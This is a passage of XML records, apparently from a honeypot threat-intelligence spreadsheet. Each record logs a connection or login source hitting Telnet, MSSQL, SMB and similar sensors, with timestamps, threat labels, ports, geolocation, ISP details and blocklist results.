    <s v="45758"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="residential"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3131:b877"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2232"/>
    <x v="2232"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T15:08:49"/>
    <d v="2025-04-06T13:23:58"/>
    <d v="2025-04-11T15:08:49"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:a15d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2233"/>
    <x v="2233"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T14:44:52"/>
    <d v="2025-04-11T14:42:26"/>
    <d v="2025-04-11T14:44:52"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MP"/>
    <s v="Madhya Pradesh"/>
    <s v="Gwalior District"/>
    <s v="Morār"/>
    <s v="1262783"/>
    <s v="NA"/>
    <s v="26.2264"/>
    <s v="78.2248"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="RELIANCEJIO"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:983a:1bcf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2234"/>
    <x v="2234"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T14:44:50"/>
    <d v="2023-08-06T15:00:00"/>
    <d v="2025-04-11T14:44:50"/>
    <n v="529"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H25&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;80&amp;&amp;41316&amp;&amp;1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Hingoli"/>
    <s v="Hingoli (Ramakrishna Nagar)"/>
    <s v="1270072"/>
    <s v="431513"/>
    <s v="19.7449"/>
    <s v="77.1555"/>
    <s v="58678"/>
    <s v="Intech Online Private Limited"/>
    <s v="Ajay Cable And Broadband Services Opc Pvt. Ltd"/>
    <s v="residential"/>
    <s v="Ajay Cable And Broadband Services Opc Pvt. Ltd."/>
    <s v="2018-03-22"/>
    <s v="ACBSPL"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.112.32.20,51890)}&amp;&amp;{Data_SMB:Incoming connection (103.112.32.20,52677)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6770:2014"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2235"/>
    <x v="2235"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T14:09:49"/>
    <d v="2025-04-11T14:09:49"/>
    <d v="2025-04-11T14:09:49"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:b754"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2236"/>
    <x v="2236"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T13:55:44"/>
    <d v="2025-04-11T13:55:44"/>
    <d v="2025-04-11T13:55:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:5655"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2237"/>
    <x v="2237"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T13:38:27"/>
    <d v="2025-04-11T13:36:43"/>
    <d v="2025-04-11T13:38:27"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="143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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:802e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2238"/>
    <x v="2238"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T13:38:26"/>
    <d v="2025-04-11T13:38:26"/>
    <d v="2025-04-11T13:38:26"/>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f:e8e0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2239"/>
    <x v="2239"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T13:35:22"/>
    <d v="2025-04-03T16:15:23"/>
    <d v="2025-04-11T13:35:22"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Latur"/>
    <s v="Ausa"/>
    <s v="1278139"/>
    <s v="NA"/>
    <s v="18.2473"/>
    <s v="76.4993"/>
    <s v="149240"/>
    <s v="Megatel Networks Private Limited"/>
    <s v="Megatel Networks Private Limited"/>
    <s v="business"/>
    <s v="Nddr"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.88.56.22,59084)}&amp;&amp;{Data_SMB:Incoming connection (103.88.56.22,59477)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6758:3816"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2240"/>
    <x v="2240"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T13:35:17"/>
    <d v="2025-03-28T05:57:07"/>
    <d v="2025-04-11T13:35:17"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cd:95f1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2241"/>
    <x v="2241"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T13:29:45"/>
    <d v="2024-12-06T09:38:00"/>
    <d v="2025-04-11T13:29:45"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="NA"/>
    <s v="12.9719"/>
    <s v="77.5937"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation"/>
    <s v="business"/>
    <s v="Railtel"/>
    <s v="2015-11-05"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f6:c292"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2242"/>
    <x v="2242"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T13:22:37"/>
    <d v="2023-07-24T20:29:09"/>
    <d v="2025-04-11T13:22:37"/>
    <n v="1880"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SMB_H42&amp;&amp;SMA-LAB_PJL_H45&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_NTP_H13&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_DNS_H5&amp;&amp;SMA-LAB_SSH_H17&amp;&amp;SMA-LAB_HTTPS_H25&amp;&amp;SMA-LAB_SOCKS5_H45&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;389&amp;&amp;445&amp;&amp;9100&amp;&amp;5900&amp;&amp;123&amp;&amp;80&amp;&amp;53&amp;&amp;22&amp;&amp;443&amp;&amp;1080&amp;&amp;61949&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Satara"/>
    <s v="Pānchgani"/>
    <s v="1260577"/>
    <s v="NA"/>
    <s v="17.8882"/>
    <s v="73.8566"/>
    <s v="141533"/>
    <s v="J K Connect"/>
    <s v="J K Connect"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2021-02-05"/>
    <s v="JKCONN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a2:a00a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2243"/>
    <x v="2243"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T13:18:12"/>
    <d v="2025-04-11T12:30:03"/>
    <d v="2025-04-11T13:18:12"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Dinajpur Dakshin"/>
    <s v="Daulatpur"/>
    <s v="1273379"/>
    <s v="NA"/>
    <s v="25.326"/>
    <s v="88.3299"/>
    <s v="135872"/>
    <s v="GTPL KCBPL BROADBAND PVT LTD"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="residential"/>
    <s v="Sweety"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67ab:f678"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2244"/>
    <x v="2244"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T13:10:56"/>
    <d v="2025-04-11T13:10:56"/>
    <d v="2025-04-11T13:10:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:aad0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2245"/>
    <x v="2245"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T13:10:21"/>
    <d v="2025-03-02T10:03:45"/>
    <d v="2025-04-11T13:10:21"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="47"/>
    <s v="Gyeongsangbuk-do"/>
    <s v="Uljin County"/>
    <s v="Uljin County (Jukbyeon-myeon)"/>
    <s v="1833762"/>
    <s v="NA"/>
    <s v="37.0598"/>
    <s v="129.422"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:77ca:d86"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2246"/>
    <x v="2246"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T12:59:30"/>
    <d v="2024-11-21T16:56:44"/>
    <d v="2025-04-11T12:59:30"/>
    <n v="29"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="ACT Fibernet"/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (183.83.51.156,61029)}&amp;&amp;{Data_SMB:Incoming connection (183.83.51.156,61911)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b753:339c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2247"/>
    <x v="2247"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T12:55:54"/>
    <d v="2025-02-17T14:59:24"/>
    <d v="2025-04-11T12:55:54"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Faridabad"/>
    <s v="Faridabad (Sector 21C)"/>
    <s v="1271951"/>
    <s v="121001"/>
    <s v="28.4314"/>
    <s v="77.296"/>
    <s v="134316"/>
    <s v="IAXN Telecom Pvt. Ltd."/>
    <s v="AXN Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2016-05-18"/>
    <s v="AXNTEL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_SMB:Incoming connection (103.219.140.154,55989)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.219.140.154,53075)}&amp;&amp;{Data_SMB:Incoming connection (103.219.140.154,53671)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67db:8c9a"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2248"/>
    <x v="2248"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T12:38:44"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-11T12:38:44"/>
    <n v="117"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_DNS_H1&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;27734&amp;&amp;53&amp;&amp;49809&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
